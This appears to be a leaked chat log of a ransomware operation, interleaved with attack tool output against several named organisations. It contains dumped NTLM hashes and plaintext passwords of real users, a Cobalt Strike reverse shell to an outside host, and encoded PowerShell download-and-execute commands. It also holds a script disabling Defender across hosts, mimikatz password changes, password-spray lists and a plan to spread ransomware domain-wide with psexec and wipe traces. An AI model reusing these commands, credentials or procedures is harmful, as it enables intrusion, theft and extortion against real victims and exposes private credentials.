		ADMIN$ C$.
Shares for W08872612199:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for W080332420B:
	[--- Unreadable Shares ---]
		IPC$
		Nic's Printer
		Upstairs MFP M477 PCL 6
	[--- Listable Shares ---]
		ADMIN$ C$ D$ print$ Users
Shares for W088726111911:
	[--- Unreadable Shares ---]
		IPC$
		tech library
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for W08987711194:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for W0887261216KO:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$ E$ print$
Shares for W08987712192:
	[--- Unreadable Shares ---]
		HP LaserJet Pro MFP M426f-M427f PCL-6
		IPC$
		MS Publisher Color Printer
	[--- Listable Shares ---]
		ADMIN$ C$ D$ print$
Shares for W08987711193:
	[--- Unreadable Shares ---]
		IPC$
		TJ New HP Color LaserJet Pro M478f-9f PCL-6 (V4)
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for W088726121925:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$
Shares for W08987710193:
	[--- Unreadable Shares ---]
		IPC$
		TJ NEW PRINTER HP Color LaserJet Pro M478f-9f PCL-6 (V4)
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for W08987711192:
	[--- Unreadable Shares ---]
		IPC$
		NPI02DE8A (HP LaserJet 400 M401dne)
		TJ NEW HP Color LaserJet Pro M478f-9f PCL-6 (V4)
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for W088726121926:
	[--- Unreadable Shares ---]
		IPC$
		Nic's Printer
		Upstairs MFP M477 PCL 6
	[--- Listable Shares ---]
		ADMIN$ C$ D$ print$ Users
Shares for W088726111916:
	[--- Unreadable Shares ---]
		IPC$
		tech library
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for W08987711191:
	[--- Unreadable Shares ---]
		dominics
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for DESKTOP-CGJQ23A:
	[--- Unreadable Shares ---]
		G$
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$
Shares for WILMA:
	[--- Unreadable Shares ---]
		I$
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$ D$ G$
Shares for DESKTOP-GCPB49A:
	[--- Unreadable Shares ---]
		D$
		IPC$
		NPI7CF108 (HP Color LaserJet MFP M477fdw)
	[--- Listable Shares ---]
		ADMIN$ C$ print$
Shares for NDDEVSPARETECH1:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		ADMIN$ C$

Potential targets in NDLEADING unlikely of course, they changed passwords YES on 21-22 and there are only two check this one in LA
but check this password on other L.A.C.s
TJ:1001:aad3b435b51404eeaad3b435b51404ee:e5c3bb4d14467ce9d23a46ea650f0012:::      ---- carrington123
``there's still a shitload of linuxes we could get into and where is 445[ ](https://mediaeveryone.com/group/snpartners-com?msg=ZGwALMCyRJQGLoJYk) open and there are only 10 npc in it? all within the same oushka and no access there and 1 server one we see 3 user subnets and we can go anywhere there on the server subnet have you checked where? first two no, third user8 I think I checked and it doesn't work either
and 4 do not remember check if they do not open us new cars?
Administrator:500:aad3b435b51404eeaad3b435b51404ee:12bd62ad7e74da42794b82f59d3c18ee:::
jason:1002:aad3b435b51404eeaad3b435b51404ee:c06bbf80fa38c366ca3803b9e922bdd4:::
LEADMIN:1004:aad3b435b51404eeaad3b435b51404ee:dbc1746c544b6621dba9fa0a1eeb7fdf:::
TJ:1001:aad3b435b51404eeaad3b435b51404ee:e5c3bb4d14467ce9d23a46ea650f0012:::
``one domain microadministrator seems to have one and you didn't take off the clear pass? right, we rem sap has different passammmms la
```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:12bd62ad7e74da42794b82f59d3c18ee:::
jason:1002:aad3b435b51404eeaad3b435b51404ee:c06bbf80fa38c366ca3803b9e922bdd4:::
LEADMIN:1004:aad3b435b51404eeaad3b435b51404ee:dbc1746c544b6621dba9fa0a1eeb7fdf:::
Remote Support:1003:aad3b435b51404eeaad3b435b51404ee:5ce89fa1e9148477eb5d6aa455c2d494:::
Remote Support:1002:aad3b435b51404eeaad3b435b51404ee:0a564fe23c310f2850166ee68647928f:::
Remote Support:1003:aad3b435b51404eeaad3b435b51404ee:e4205612428e614cda5b5f82a6346771:::
Remote Support:1002:aad3b435b51404eeaad3b435b51404ee:e998f2240a4dce990f99bcfccd7f3d9c:::
Remote Support:1002:aad3b435b51404eeaad3b435b51404ee:c41814b44449d1944c1ef51a80384d36:::
Remote Support:1002:aad3b435b51404eeaad3b435b51404ee:e8e7a6d162f5dbde58a9065a44140834:::
Remote Support:1002:aad3b435b51404eeaad3b435b51404ee:1c0bbc2448c9d2fdf45389c83cdc124f:::
TJ:1001:aad3b435b51404eeaad3b435b51404ee:e5c3bb4d14467ce9d23a46ea650f0012:::
``We found yesterday that the servers (not DK) have the same LA, but we haven't been able to unroot yet
```
SMB 172.31.190.66 445 JDOCHSVC12 500: JDOCHSVC12\ZEUS (SidTypeUser)
SMB 172.31.190.66 445 JDOCHSVC12 501: JDOCHSVC12\_guest (SidTypeUser)
SMB 172.31.190.66 445 JDOCHSVC12 513: JDOCHSVC12\None (SidTypeGroup)
SMB 172.31.190.66 445 JDOCHSVC12 1000: JDOCHSVC12\WinRMRemoteWMIUsers__ (SidTypeAlias)
SMB 172.31.190.66 445 JDOCHSVC12 1002: JDOCHSVC12\Direct Access Users (SidTypeAlias)
SMB 172.31.190.66 445 JDOCHSVC12 1004: JDOCHSVC12\Anonymous (SidTypeAlias)
SMB 172.31.190.66 445 JDOCHSVC12 1005: JDOCHSVC12\Message Capture Users (SidTypeAlias)
SMB 172.31.190.66 445 JDOCHSVC12 1007: JDOCHSVC12\CtxAppVCOMAdmin (SidTypeUser)

```
```
SMB 172.31.190.17 445 JDODHCP02 [+] Brute forcing RIDs
SMB 172.31.190.17 445 JDODHCP02 500: JDODHCP02\ZEUS (SidTypeUser)
SMB 172.31.190.17 445 JDODHCP02 501: JDODHCP02\_guest (SidTypeUser)
SMB 172.31.190.17 445 JDODHCP02 503: JDODHCP02\DefaultAccount (SidTypeUser)
SMB 172.31.190.17 445 JDODHCP02 513: JDODHCP02\None (SidTypeGroup)
SMB 172.31.190.17 445 JDODHCP02 1000: JDODHCP02\DHCP Users (SidTypeAlias)
SMB 172.31.190.17 445 JDODHCP02 1001: JDODHCP02\DHCP Administrators (SidTypeAlias)
SMB 172.31.190.17 445 JDODHCP02 1002: JDODHCP02\Direct Access Users (SidTypeAlias)
user@user-tobefilledbyoem:~$ proxychains cme smb 10.99.194.151 -d jdossn -u nddevbernst -p Tractor20!
```
It looks something like this we'd love to)let's try to get in deeper and get a foothold there todayYes. They seem to be rebuilding the grid. There's new computers. I thought there was some progress, huh?
	 * Username : ndcartleich
	 * Domain : JDOSSN
	 * NTLM : ee0907810044b786f7b5504842161191
 
	 * Username : ndcarrtedro
	 * Domain : JDOSSN
	 * NTLM : c9e553f47018e2be97ec3307bd47df25
 
	 * Username : ndcarjjohns
	 * Domain : JDOSSN
	 * NTLM : ecb13250eceddc92b4f7f081f02f8685
 
	 * Username : ndcarjegger
	 * Domain : JDOSSN
	 * NTLM : ecb13250eceddc92b4f7f081f02f8685
 
	 * Username : ndcarhsherm
	 * Domain : JDOSSN
	 * NTLM : 0f1ffe1daf861353d1e2461538531635
 
	 * Username : ndcardkolst
	 * Domain : JDOSSN
	 * NTLM : b9b6aa1456c1a351844910877a487cf9
``````
	 * Username : ndmictflana
	 * Domain : JDOSSN
	 * NTLM : 7bba5ae0ee513a322b7cf6b8768bb063
Strange that all functions are affected I can not tell all by myself I will try to spawn from another user from another car)[ ](https://mediaeveryone.com/channel/general?msg=CNPm6wjaL5G2ftqAE) it as spawn did not help work through remotno I would try respawn try cmd substitute what rights to you?
beacon> spawn vew
[*] Tasked beacon to spawn (x86) windows/foreign/reverse_https (hitark.com:443)
[+] host called home, sent: 840 bytes
[-] could not spawn C:\Windows\syswow64\wusa.exe: 740
Try to spawn a new session only one (on one server), nothing to move on all sessions? The same crap on execute-assembly... it doesn't matter what to run... I copied this piece from an attempt to run portcan[ ](https://mediaeveryone.com/channel/general?msg=ihcvpciBtarPTHnCD) this what for? why do you need this server?
```
[-] could not spawn C:\Windows\syswow64\wusa.exe: 740
[-] Could not connect to pipe: 2
``Check through rubeuswow on theoretically related servers ticketpngc - all the credentials are valid, but no one has rights. there are 21 cars on the network and it's servers. Inway is not catching anything yet. The impression is that they all work through RDP.  In addition, they seem to be all virtual machines (but not sure yet - I am checking) #pcsb-org
no access to neighboring domains
ports are being scanned, morphs are being checked for nasa and other things @user7 and i'm digging tvs what are your current tasks? for now what do you have to work with? are there any new networks coming today? hi:man_raising_hand:is the internet working? hi:space_invader:everybody hello there!!!!``
RAJA-9298::ZOHOCORP:b3bd81e12761c973:76647c5c0cb37ce1c766147e15568b0b:010100000000000088fc2e71da91d6018a6e4cf93dbf74f500000000020006004c00410042000100100048004f00530054004e0041004d004500040012006c00610062002e006c006f00630061006c000300240068006f00730074006e0061006d0065002e006c00610062002e006c006f00630061006c00050012006c00610062002e006c006f00630061006c000700080088fc2e71da91d60106000400020000000800300030000000000000000100000000200000a2ccd58658f72e5537fd61255fea70627e2dcfe35c6d4c095f02c99ac2a92ad80a001000000000000000000000000000000000000900440048005400540050002f00720061006a0061002d0039003200390038002e006300730065007a002e007a006f0068006f0063006f007200700069006e002e0063006f006d000000000000000000:Niji@1302.
``We've set up a timeserver, let's try to pierce through it.
FortiClient -- The Security Fabric Agent
=======
ra-2ji1
``````
FortiClient -- The Security Fabric Agent
=======
rajanij132

``````
ManageEngine Password Manager Pro - Mozilla Firefox
=======
ampaso19
````WINONA\TOM abcabc4`https://vc1.rtpco.local/,https://vc1.rtpco.local/websso/SAML2/SSO/vsphere.local,10/22/2019 9:50:32 AM,13216229432847862,winona\tom,abcabc4````
--- Chromium Credential (User: TOM) ---
URL : http://home.rtpcompany.com/Account/LogOn
Username : winona\tom
Password : abcabc4

--- Chromium Credential (User: TOM) ---
URL : https://us.sso.covisint.com/sso
Username : tkoenig
Password : GreenTan123

--- Chromium Credential (User: TOM) ---
URL : https://us.sso.covisint.com/sso
Username : TKOENIG
Password : GreenTan123

--- Chromium Credential (User: TOM) ---
URL : https://kaseya.rtpcompany.com/vsapres/web20/core/login.aspx
Username : tom
Password : Passw0rd!

--- Chromium Credential (User: TOM) ---
URL : https://www.myhealthevet.va.gov/mhv-portal-web/anonymous.portal
Username : tkoenig5
Password : xyzxyz8?

--- Chromium Credential (User: TOM) ---
URL : https://www.myhealth.va.gov/mhv-portal-web/home
Username : tkoenig5
Password : xyzxyz8?

--- Chromium Credential (User: TOM) ---
URL : https://mail.rtpcompany.com/Login.aspx
Username : tkoenig@rtpcompany.com
Password : PDLPDL7

--- Chromium Credential (User: TOM) ---
URL : http://hyperic.winona.rtpco.local:7080/j_spring_security_check
Username : hqadmin
Password : rtprtp1

[*] Finished Google Chrome extraction.

[*] Done.

````https://vc1.rtpco.local/websso/SAML2/SSO/vsphere.local `10.4.0.223 `https://vmwaremgr.winona.rtpco.local `How are you doing? Do you have time to close today? It's okay, we can distribute it quietly and make it in three trusts200 pcsWait, not much. and servers? I have not counted yet, about 2000 machines?
[DC] 'us alloyp'.
[DC] 'us.alloypolymers.com' will be the domain
[DC] 'GAHDC01.us.alloypolymers.com' will be the DC server
[DC] 'winona.rtpco.local' will be the user account
ERROR kull_m_rpc_drsr_CrackName ; CrackNames (name status): 0x00000002 (2) - ERROR_NOT_FOUND


$krb5tgs$23$*jerickson$rtpco.local$MSSQLSvc/Web4.winona.rtpco.local: Colorado04


``Till tomorrow)`` do you thank you, see you tomorrow)``Don't forget to clean up after yourself,`` Thank you all, good night)`` So, well, that's it. Today that's all, throw the session in the slip for 100 seconds +-, tomorrow we will continue) when trying to load a non-formed file writes an error (>4Gb) When you remove the ad info, remove the entire, all 6 files and download the same 6 files in the confab) Files over 50 meters are archived. Files over 200 mb in a compressed state are not downloaded through the cobaDon't forget to delete files created in the process of running commands! Today up to 12 daTo the second group alsoTry to work with her, maybe there faster copeIn the first group coba new session ``
[*] Tasked beacon to list processes
[+] host called home, sent: 12 bytes
[*] Process List with process highlighting
[*] Current Running PID: Yellow 892
[*] Explorer/Winlogon: BLUE
[*] Admin Tools: LIGHT BLUE
[*] Browsers: GREEN
[*] AV/EDR: RED
````.`[ ](https://mediaeveryone.com/channel/general?msg=3Dpt6nx8F2Yu9Km9o) .\[text\]\[text]\[qqq\]\[\url{https://katex.org/}\]sessions are gone༼ つ ◕_◕ ༽つ and what about the task?\{\a'\a'\underline{you yo piraka} doesn't work)\overgroup{Ingeborge Dapkunaite}{and how katya works\overgroup{Ingeborge Dapkunaite}?
 The mistakes of youth were easy to get away with.
Ah, youth, - the magic sound of a whistle.
We often sawed off the bough beneath us.
Now we are not the same, and the bitches have grown old.

``Thank you at the very bottom of the field``vfhrth`````

``````
right here)
`````'marker
123
007user1 - charmer, he has a message for me in a personal) + + in pm does not leave a message++All here? hahaI'm cheerfulGreat, who is not with us yet? Let them write in the slack works like everythinghttp://joxi.ru/D2PNv3QUJB5qNrI got a message, but to read it nowhereNo access to the PM we have the rights are cuthttp://joxi.ru/823GVzpTru/823GVzpT8a06L2+1 white screen with all white+also white screen can not? in slek otpisiteen not fit the passwords at 3hi not all can enter-no one came personal messages? also white screenThere is nothing at all also no field to enter a message? I have a white background, no one personally with me does not open? user8[ ](https://mediaeveryone.com/channel/general?msg=2o2AnJQySQ6eGTJzD) about this, https://mediaeveryonecom/account/security - encryption E2E and reset the keyI can not write in person, please make me a human nickname Stalinnu me and the user is goodI do not understand what encryption password is required of me if you want uniqueness - nicknames in private) +++ got the open kmd but still can not pull in the cob, but managed to pull in ptsh, tomorrow will get all the information and will be untwisteddatax there's a flag -keep, when it gathersaablocks the session process kobydelka new not deleted whytomorrow by 3pick up, sessions in slipskoronu already 12takte guys you threw, no LA-parole not found the LA - admin and tsun-tsunetdo system does not risea, there vpn offu me in koba session what did not help?in tpsh did not fly? psh did not help? yes it's from here? a few pieces i threw out it ...? give me a screenshot of the lk without a VPN have anything to work with?
```
http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx
```
ipn: Sage
i have no configs, i've tried everything manually, then i went through SauronEye, it's empty now i'll try it. i thought you were asking about arma or servda) fuck, you mean armitage ? only arma is available, i can't pull it there try to pull arma, win 10 now i'll try again in pts[ ](https://mediaeveryone.com/channel/general?msg=xAtkL5zvKkpzfAerN) and arma ?[ ](https://mediaeveryone.com/channel/general?msg=SpZYc5ZQE437xD8NP) that's my problem[ ](https://mediaeveryone.com/channel/general?msg=sFyr6iw2y3adPmDMa) this thing was on tasks@user7 you have what on tasks was before? still the same - need to build a dll then to mebug tpsh because of socket chokeOrrnOvOvOrnOvOr three times I have not come to him either I read my mind or more details for the question what is the ptsh?who needs to bild the shellcode to @user7@user7 was ready to volunteer not raised the sessionWhy? i need a volunteer can generate a new dll? i launch, the process hangs, but the session did not come dll? i can not draw in the coba and ptsh, kmd is closed but opened, does not let you run any exe file today till 12soglas, in the personal areaa did you order?) do not forget to make me an account in ptsh) check ipn and other things ``
beacon> shell net group "Domain Admins" /dom
[*] Tasked beacon to run: net group "Domain Admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
这项请求将在域 WORKGROUP 的域控制器处理。

发生系统错误 1355。

指定的域不存在，或无法联系。

```
This request will be processed on the domain controller of the WORKGROUP domain.

There was a system error 1355.

The specified domain does not exist or cannot be contacted.
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes

``Domain is not responding there is a session in cobepop)`` on the external domain since they even have passwords repetition[ ](https://mediaeveryone.com/channel/general?msg=ShchebxkiSDtqpeN4) the internal one is the same?
http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx

What domain did you have? Check if there is a pschhe I typoed or what? If it does not appear, then the socket server has failed and you will not have interactivethe bottom left of the window pops up sockets coopedd when logging in the pschhe who have not noticed the pricholbytnu thin or moderately delayed in 5 characters go or so it also dies?write with your hands and you don't copy it, it stops responding after trying to insert it try to run powershell.it doesn't respondkmda it doesn't write so in general tpsh domain pinged visible or dasgenerate a new onethispowershell.exe -nop -w hidden -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AGkAZABlAGkAbwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBjAHMAcwAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AbQBpAG4ALgBjAHMAcwA/AHYAaQBkAD0AWABjAGMAMwBSAFAAawBVAGMATwBEAHIAegBiAGQAagBJAFAAaQBIAHYAcABMAHcAYwBRAFUAcgBjAHkASQB6AHUAbABkAHcARQBFAGUAYQAnACkAKQA7AA==то write with your hands if you don't copypaste the loadpaste what are you trying to do?but the load doesn't paste something[ ](https://mediaeveryone.com/channel/general?msg=agTv5YDd7WNBgFCha) i clicked and it's been 5 minutes since then3 item super-duperper? below enter?[ ](https://mediaeveryone.com/channel/general?msg=pDJmChgpTzunrmnaK) something on elfiskom if it didn't paste mb not copied3 top after enter+win10?on my car the pcm doesn't work in kmd call the menu on your axis and see what item you have pasted then open cmd on your car I don't think (P) just find out what's in it. notepad.exe >> file >> open >> C:\system32 >> cmd.exe >> pcm >> gcnp right here write back as done@user7 help kmd what's erp, oa? I put everything that was run analogues?
peptide*))8ethan.yu
peptide1*leon
leon20180928no access to directories, too. Of available only mozilla and some little things like Word and Isis.
no shells:thumbsup:@user8
```
http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx leon leon20180928
http://citrix.peptide.cn:81/citrix/xenapp/auth/login.aspx mason peptide*))8
http://citrixen.peptide.cn/citrix/xenapp/auth/login.aspx leon leon20180928
http://citrix.peptide.cn:81/citrix/xenapp/auth/login.aspx ethan.yu peptide1
http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx dgs00318 peptide1*
http://citrix.peptide.cn/citrix/xenapp/auth/login.aspx ethan.yu peptide1*

in this case there is something to work with) already told@user3 will tell us there is a variant of loading the script in the memory of the ps itself in the tpc file run is always disabled in fact i will try in the tpc import yet in problems - command, output already said i tried to import ps1 script by rd and run it
writes disabled by the admin what does it mean to disable import and run if tpsh arrives? at least i tried to rdp in ps to do itkst, there is a neuter smblogin for ps anyway check hit then most likely already going back timer)no well it's possible, but i think i already made a noise)and when you start to make noise will not come?)polzak is dead, no his files[ ](https://mediaeveryone.com/channel/general?msg=kkoPu7T8eonmEBDok) 1) psh on the rpd, you hold a session polzak and if he flies in and sees the open psh and stuff will be unpleasant
2) tpsh can scan hosts by hash, check git@tl1 i can use that dll you gave me yesterday ?@tl1 Give me a clean cryptor
devry.edu
```
Coba and arma are not attracted (in all likelihood some iron blocker traffic)
Attracted tpsh, but what's the point of it if I have rdp psh
attracted msf, raised the system on a virtual machine
tried to scan network, session with a route or forwarding almost immediately dies
Same with brute force on LA - roth and portfwd kill the session
Broot on LA, each time resetting session, there is LA only on the same virutals useless
ms17 kills it right away.
I'm in the middle of a stalemate, thank you@user7
```
https://ucfapps.cloud.com/citrix/storeweb/ je517380@ucf.edu Sawgrass20@

``@user4
```
https://studentappst.asu.edu/vpn/index.html egomez34 Pupilo10169!

``Create the group cpcc.edu I'm not there I'm not there everyone has tasks?
for /f %%i in (ip.txt) do (copy wdoff.bat \\%%i\C$\ProgramData && wmic /node:%%i process call create "cmd /c wdoff.bat")
``````
10.0.0.25
10.0.20.222
10.10.0.118
10.0.10.131
10.0.0.24
10.0.10.103
10.0.10.96
10.0.10.101
10.0.10.134
10.10.0.131
10.0.10.133
10.0.10.35
10.0.20.231
10.0.20.83
10.10.0.134
10.0.10.168
10.0.10.116
10.10.0.117
10.10.0.135
10.10.20.131
10.0.10.111
10.10.20.126
10.0.10.126
172.17.0.8
10.0.10.129
10.0.10.163
10.0.10.93
10.0.10.83
10.10.0.103
10.0.20.100
10.0.10.143
10.10.0.129
10.0.10.9
172.17.0.13
10.0.10.139
10.0.10.117
10.0.10.12
10.0.10.110
172.17.0.13
192.168.0.228
192.168.0.69
10.0.20.160
192.168.5.114
10.0.20.187
10.0.10.137
192.168.0.15
10.0.10.91
192.168.0.35
10.0.10.125

``````
NEW NTLM : 04ddcbb1734a5a868580438cb75d7c2c
``````
pth ITC\br_admin 555601b2d489ec2bfb7d189544736c8b
 
mimikatz lsadump::changentlm /server:ITC.local /user:Administrator /old:0cc0cdacd8aa7f3b06e7cdfffa909b11 /newpassword:CAKE@horse369!@@321
``make_token itc.local\br_admin CAKE@horse369!@@.``
Administrator bkupsvc br_admin
bu_veeam eagle egl_admin
egladmin egltech nk_admin
PassportalSync paustin SLEAdmin
superlogin vmware aadsync
````mimikatz lsadump::changentlm /server:sprouselaw /user:aandaservice /old:1737a8ca4966a1b4cf767232b0a4bd58 /newpassword:jackc!76DF37bd` new password for YES ``CAKE@horse369!@@321``Are we ready to start?
```
1. pinging live WS.
2. Disable WinDef
3. Uninstall starter on WS + shut down Malware.
4. Spread starter on servers (in system32), except DC. On servers with SQL we stop SQL processes manually (net stop mssqlserver) or kill them. Run the starter manually.
5. Run starter domen-wide (psexec \\* -d -s -h start.exe -accepteula -y)
6. Extinguish DC
``EA:
```
	* Username : egl_admin
	 * Domain : ITC
	 * Password : E@gle@x1s3030
```

DA:
```
	* Username : br_admin
	 * Domain : ITC
	 * Password : CAKE@horse369!@@
``? or is there another one? Use KCunZoziQUNQQoJta54VhbE7Y8PD8FPDSGWulQ3gvxuiG7SFE4tGY4mHcaYmlFZM2107.161.126.162:15127 XloTvJNB02:51 PMsimple time here it does not crush our exe
malwarebytes is installed on several servers (not BOLO) - uninstall it
everything
fresh pings and we can stop now? so what do we have here? so any list including password
sqlpassword
sa
sa1
P@ssword Try that popular passwords
there are usually no specific polices on "sa" accounts-tried to brute force "sa" accounts on skulls ?
SQL Process:
	ITC-SQL01.ITC.LOCAL 10.0.0.16
	ITCMA-SQL02.ITC.LOCAL 10.0.0.81
	ITC-SHIP01.ITC.LOCAL 10.0.0.18
	ITCMA-RDS01.ITC.LOCAL 10.0.0.8
	ITCMA-FILE01.ITC.LOCAL 10.0.0.39
	ITC-DC-SVR01.ITC.LOCAL 10.0.0.14
``Let's do a little work on the rest of them now @tl1 is coming and let's get started @Tl1 @tl2What's up? are we starting? on the rdp went to the server to look at the malware, no ill did not make any noise?it's not cloudy I'm talking about launching it does not swear at startup, check the browser does not swear at the exea so on the fact of launching the cloud will fuck up and on 90% of the boot will chop the browser on the fact of loading or on the startup?
192.168.0.227
```
  DisplayName : Malwarebytes Anti-Malware version 1.80.2.1012
  DisplayVersion : 1.80.2.1012
  Publisher : Malwarebytes Corporation
  InstallDate : 6/13/2019 12:00:00 AM
  Architecture : x86

  DisplayName : Malwarebytes Anti-Exploit version 1.13.2.283
  DisplayVersion : 1.13.2.283
  Publisher : Malwarebytes
  InstallDate : 10/14/2020 12:00:00 AM
  Architecture : x64
``ITCMA-FILE01
10.0.0.39
```
  DisplayName : Malwarebytes Anti-Malware version 1.80.2.1012
  DisplayVersion : 1.80.2.1012
  Publisher : Malwarebytes Corporation
  InstallDate : 6/13/2019 12:00:00 AM
  Architecture : x86


  DisplayName : Malwarebytes Anti-Exploit version 1.13.2.283
  DisplayVersion : 1.13.2.283
  Publisher : Malwarebytes
  InstallDate : 10/13/2020 12:00:00 AM
  Architecture : x64
yes it seems, just the opposite when? always disconnected aposto mcafee as well? it is likely to catch on the dynamics in particular, now interested in malwarebytes bad enough@tl1 do we have statistics, how do antiviruses treat our builds?[ ](https://mediaeveryone.com/group/itc-us-com?msg=gTtYwkRBNwjyaHSSC) about the build for lin question, we should clarify so if everything is ready here, put the build> In the end, what is done is done.
Yes, I just do not want to be and then there were discussions on this subject1) just look for accesses, keys, sessions in the system from the cars techs
2) check accesses and leave no traces
3) See what we need
4) clean the logs for themselves if we're talking about working with linuxxschnu means control through the scheme does not require a browser And if it had not done so would not have known NEVERThat's allThere's fucking authorization just look what is thereThat we do not watch the history of all browsers and not authorized in the LCwhy *Browser admin) what have not checked?It would not have been checked))) The point is that because they were in a hurry and did not check it, it remains a mystery50 to 50-50 it's a finger in the sky50/50 may well have been.
that there may have been key nodes in the organization in those domains?
```
There might not have been key nodes in those domains? what diap was scanned? that there might have been key nodes in the organization in those domains? what does that tell you? Can you explain without making assumptions, does having a couple more domains say anything? no more And this is all just your guesses Outsourced accounting yf jnenjhst scale of 20 pc? accounting and offices if not dead yet, it at least has a logistics company has been around for half a centuryhttp://www.pkgprod.com/our-history/[ ](https://mediaeveryone.com/group/matches?msg=JEX3hXd5xkpn8MLzC) and well yes lastset he has earlier``?
pwdlastset : 8/17/2020 4:36:45 PM
mailnickname : Louisad
``````
pwdlastset : 7/4/2013 2:00:27 PM
``````
[*] 10.7.20.80:445 - 10.7.20.80:445 - Correct credentials, but unable to login: 'matches\mercedesd:Dinham2323',
[*] 10.7.20.120:445 - 10.7.20.120:445 - Correct credentials, but unable to login: 'matches\mercedesd:Dinham2323',
[*] 10.7.20.70:445 - 10.7.20.70:445 - Correct credentials, but unable to login: 'matches\mercedesd:Dinham2323',
[*] 10.7.20.30:445 - 10.7.20.30:445 - Correct credentials, but unable to login: 'matches\mercedesd:Dinham2323',
[*] 10.7.20.190:445 - 10.7.20.190:445 - Correct credentials, but unable to login: 'matches\mercedesd:Dinham2323',
[*] 10.7.20.120:445 - 10.7.20.120:445 - Correct credentials, but unable to login: 'matches\mercedesd:Dinham2323',

``a well lassset''.
whencreated : 5/20/2014 11:39:09 AM
samaccountname : Louisad
``Well, there ``couldn't be a 2020 there since
```
mdbusedefaults : True
whencreated : 7/4/2013 12:00:27 PM
name : Veeam Backup
badpwdcount : 0
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
usncreated : 46175
primarygroupid : 513
pwdlastset : 7/4/2013 2:00:27 PM
``````
M@tches2020!
M@tches2020!
M@tches2020!
Matches2014
matches123
matches123!
matches123!!!
m@tches123
m@tches123!
m@tches123!!!
Matches123!
Matches123!
Matches123!!!
M@tches123
M@tches123!
M@tches123!!!
Dinham2323!
Dinham2323!
Dinham2323!!!
Dinh@m2323!
Dinh@m2323!
Dinh@m2323!!!
``what was the vocabulary? I can't know, ``net accounts /dom`` don't work out... how many failed attempts were there? that's too bad``.
[-] 10.7.20.30:445 - Account lockout detected on 'Veeam', skipping this user.

``````
[+] 10.7.20.30:445 - 10.7.20.30:445 - Success: 'matches.com\Louisad:M@tches202020!
[+] 10.7.20.55:445 - 10.7.20.55:445 - Success: 'matches.com\Louisad:M@tches202020!!!'
[+] 10.7.20.60:445 - 10.7.20.60:445 - Success: 'matches.com\Louisad:M@tches202020!!!'
[+] 10.7.20.70:445 - 10.7.20.70:445 - Success: 'matches.com\Louisad:M@tches202020!!!'
[+] 10.7.20.80:445 - 10.7.20.80:445 - Success: 'matches.com\Louisad:M@tches202020!!!'
[+] 10.7.20.120:445 - 10.7.20.120:445 - Success: 'matches.com\Louisad:M@tches202020!!!'
[+] 10.7.20.190:445 - 10.7.20.190:445 - Success: 'matches.com\Louisad:M@tches202020!!!'

``Run the relay with a command like - powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAnAGgAdAB0AHAOgvAC8AMAyADcALgAwAC4AMAAuADEAOgAzADYANQA0ADEALwAnACkA not understood about the allnailer team)[ ](https://mediaeveryone.com/group/matches?msg=NnxxkxtTqAK9jinSg) We caught a couple of users yesterday
does it make sense to run invei relay with the invei team? and give me a list of processes from her pc still scan the mercedes creeds, maybe he where an admin put + brute force users from this group `CN=sec_WorkstationLocalAdmin` try to scan that admin with a dot ``.
[+] 10.7.20.30:445 - 10.7.20.30:445 - Success: '.\Louisad:M@tches2020!
``See if there were any hooks to their skul serversDidn't you shoot/search for them? There are 3 polzak, try it-this group was brutalized? `CN=sec_WorkstationLocalAdmin` No `Microsoft SQL Server 2012 Native Client` anything from here?
Microsoft Dynamics NAV RoleTailored Client 7.1.36703.0

Microsoft Dynamics NAV Setup 7.1.36703.0

British Module for Microsoft Dynamics NAV Role Tailored Client 7.1.36703.0

Office 16 Click-to-Run Extensibility Component 16.0.11929.20606

Office 16 Click-to-Run Localization Component 16.0.11929.20606

Office 16 Click-to-Run Licensing Component 16.0.11929.20606

Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40660 12.0.40660

Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 10.0.40219

Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219

HP Support Solutions Framework 12.13.42.1

Microsoft SQL Server 2012 Native Client 11.0.2100.60

Open XML SDK 2.5 for Microsoft Office 2.5.5631

ESET Endpoint Encryption 5.0.0.0

CarbonBlack Sensor 6.2.1

Jet Excel Add-In 16.1.17061.0

Microsoft System CLR Types for SQL Server 2012 11.0.2100.60

Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40660 12.0.40660

ESET Management Agent 7.0.577.0

Microsoft SQL Server 2005 Analysis Services ADOMD.NET 9.00.3042.00

Local Administrator Password Solution 6.2.0.0

Adobe Refresh Manager 1.8.0

Adobe Acrobat Reader DC 20.012.20048

